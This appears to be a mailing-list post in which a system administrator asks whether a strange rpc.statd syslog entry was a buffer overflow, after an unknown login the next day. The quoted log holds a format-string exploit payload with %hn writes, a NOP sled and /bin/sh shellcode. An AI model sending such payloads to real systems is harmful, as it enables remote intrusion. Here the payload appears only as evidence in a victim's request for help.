No Subject

[Russell Speed]

I am curious if the following is an example of a buffer overflow.  I
noticed this in my syslog - and the following day had someone logged in
from an IP I'm not aware of.

I changed the passwords - and added an entry to the input chain to block
the IP, but am wondering what other things I should do? 

Should I remove /bin/sh for something less obvious as a general
protection from buffer overflows?

As you can see it's a lot of binary and then near the end is "/bin/sh".

Sep  9 21:27:43 gw /sbin/rpc.statd[336]: gethostbyname error for
^X���^X���^Z���^Z���%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
Sep  9 21:27:43 gw
�^F/bin�F^D/shA0�\210F^G\211v^L\215V^P\215N^L\211�^K�\200�^A
�\200�\177���

Thanks,

Russell



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]